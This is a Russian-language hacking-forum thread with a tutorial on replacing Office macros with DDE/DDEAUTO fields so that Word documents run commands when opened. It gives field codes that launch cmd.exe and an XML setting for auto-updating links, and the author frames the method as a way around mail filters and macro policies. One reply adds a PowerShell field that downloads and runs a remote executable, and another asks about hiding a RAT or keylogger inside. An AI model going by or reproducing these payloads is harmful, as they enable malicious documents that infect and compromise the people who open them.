• Paranoid - курс по анонимности и безопасности в сети от команды codeby. Защита персональных данных, анонимность в сети интернет, настройка виртуальных машин, безопасная передача данных, анти форензика и еще много всего полезного. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Статья DDE на замену макросам.

IioS

Red Team
09.06.2017
227
409
#1
Предыстроия простая, посматривая просторы интернета, наткнулась на статью тут:
Для просмотра контента необходимо: Войти или зарегистрироваться
она декламирует что есть способ по создание метода который вытеснит макросы, и я загорелась желанием узнать способ создание. О своем опыте и будет эта статья.

DDE – это Microsoft Dynamic Data Exchange, позволяет выстаивать кастомное поле, в нем и создастся путь для подгружать данные из других приложений семейства Microsoft.

Протокол DDE представляет собой набор сообщений и рекомендаций. Он отправляет сообщения между приложениями, которые использует общую память для обмена данными. Приложения могут использовать протокол непрерывного обмена, когда приложения отправляют обновления друг другу по мере поступления новых данных.

Использование DDE в Excel или Word для вредоносных целей может быть весьма полезным, потому что макросы могут быть отфильтрованные почтовыми шлюзами и корпоративной политикикой VBA. Кроме того использование DDE в MSWord так же просто, как добавление поля и выполнение следующего:

1 шаг - Тык на: «Вставить», «Быстрые элементы», «Поле»:
1.png

2 шаг - Мы выбрали «= (Формула)» и Ok:
2.png

Альтернативный метода мы можем просто добавить поле, нажав CTRL + F9

3 шаг - После этого мы увидим поле, вставленное в документ, с ошибкой «Ошибка в формуле». Щелкните правой кнопкой мыши по полю и выберите «Включить или отключить коды полей»
3.png

4 шаг - Получаем это:
4.png

5 шаг - Мы должны изменить на следующее то что было на это:
Код:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
Ключевое слово DDEAUTO указывает MSWord, что это поле DDE и будет запускаться автоматически при открытии документа, вторая часть - полный путь к исполняемому файлу, который запускается, а последняя часть в кавычках - это аргументы для передачи (выполнить calc .exe).

Теперь мы сохраняем документ как обычный «.docx» и открываем его на любом компьютере. Первое предостережение - обновить ссылки на документы, там ничего злонамеренного.

6 шаг - Открывается пару окон, мы тыкаем да, да, и у нас открывается консоль, и она уже открывает то что мы хотим, в нашем случае калькулятор.

5.png

Теперь разберем выхлоп: Первое предостережение - обновить ссылки на документы, там ничего злонамеренного.
Второе - приглашение - запрашивает у пользователя, следует ли запускать указанное приложение, это можно рассматривать как предупреждение о безопасности, поскольку оно предлагает пользователю запустить «cmd.exe», однако с соответствующей модификацией синтаксиса вы можете скрыть ...

То же самое можно достичь с помощью идентификатора поля «DDE»:
Код:
{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad"}
Но в этом случае нам придется изменить .docx, чтобы включить автоматическое обновление ссылок. Для этого распакуйте файл .docx, отредактируйте word/settings.xml и вставьте следующий тег XML:
Код:
<w:updateFields w:val="true"/>
Затем мы сохраняем файл конфигурации и обновляем файл. Когда вы откроете его, Word предложит вам обновить ссылки с помощью немного другого приглашения, чем раньше, но с тем же результатом, что и DDEAUTO.
И самое лучшее, никаких макросов, никаких предупреждений о безопасности, что САМОЕ главное.

Спасибо за внимание и до новых встреч.
ps - надеюсь картинки нормально отобразятся :)
pss - а приветствие в конце, спасибо что остались до этих строк!
 

Breed

Well-known member
18.06.2017
215
244
#2
А MS не считает это опасностью и даже не чешется исправлять этот косячок! :)
Для просмотра контента необходимо: Войти или зарегистрироваться

Так что, скорее всего, этот вариант можно будет эксплуатировать в различных вариациях очень долго.
 

Inject0r

Well-known member
03.09.2016
114
180
#5
Самое главное, что касперский сразу палит вирус в файлике. И судя по скрину выше все остальные топовые антивирусники - полная фигня.
 

SooLFaa

Инквизитор
Gold Team
15.07.2016
643
1 040
#6
Отлично статья. Вот пример хорошей качественной статьи. Есть описание о чем речь. Тема хорошо названа. Есть четкий алгоритм действий. Супер вообщем. Единственное. Зачем под хайд класть это "Альтернативный метода мы можем просто добавить поле, нажав CTRL + F9"? П.С. Репой поделился.
 

IioS

Red Team
09.06.2017
227
409
#7
Очень благодарна.
Зачем под хайд класть это "Альтернативный метода мы можем просто добавить поле, нажав CTRL + F9"
Почему-то захотелось под хайд, хотя он доступен любому кто уделил 2 минуты на регестрацию, но я на будущие учту.
 

☠xrahitel☠

Well-known member
09.12.2016
79
118
#9
Очень благодарна.

Почему-то захотелось под хайд, хотя он доступен любому кто уделил 2 минуты на регестрацию, но я на будущие учту.
статья вышла раньше и лежит на всех бордах новостных
Для просмотра контента необходимо: Войти или зарегистрироваться
 

IioS

Red Team
09.06.2017
227
409
#10
статья вышла раньше и лежит на всех бордах новостных
Я не позиционировала этот метод как уникальный, а как свой опыт, все было так как я описала в начале, увидела что есть такой способ, нашла его реализацию, и решила описать это тут.
 

SooLFaa

Инквизитор
Gold Team
15.07.2016
643
1 040
#11
Главное не копипаст. Видна работа автора. Но если бы довела до РЦЕ поставил бы два плюсика но и без этого годнота.
 

☠xrahitel☠

Well-known member
09.12.2016
79
118
#12
Главное не копипаст. Видна работа автора. Но если бы довела до РЦЕ поставил бы два плюсика но и без этого годнота.
да у меня не было умысла в чем-то изобличать автора,на оборот поддерживаю что хайд не влепила до потолка :)
 

tumm

Member
10.10.2017
21
8
#13
Можно пожалуйста поподробней-как поменять сообщения при открытии документа.
 

Dmitry88

Премиум
29.12.2016
117
137
#15
Завтра дополню тему полезной нагрузкой
C word'ом получилось скрыть строку с вызовом cmd. А что делать с excel ? Поля та там обрабатываются нормально. Вызов powershell с invoke webrequest тоже. Но вот окно с вызовом cmd не нашел где убрать.

ПС: Может обновлять этот пост, что бы не пилить новые ?
[doublepost=1508930746,1508305581][/doublepost]Удалось выполнить скачивание и запуск exe. К сожалению много ругани и всплывающих окон.
{DDE "c:\\windows\\System32\\cmd.exe " "/c powershell.exe (New-Object System.Net.WebClient).DownloadFile('
Для просмотра контента необходимо: Войти или зарегистрироваться
'%TEMP%\\abcde123.exe'"}

PS: Подскажите по шифрованию строки в base64. У меня упорно PS на синтаксис ругается. (PS 4.0)
 
Симпатии: Понравилось IioS

Anspirer

New member
02.10.2017
1
0
#19
Ребят , а подскажите, RAT или кейлогер скрытый , можно туда засунуть?
 
Вверх Снизу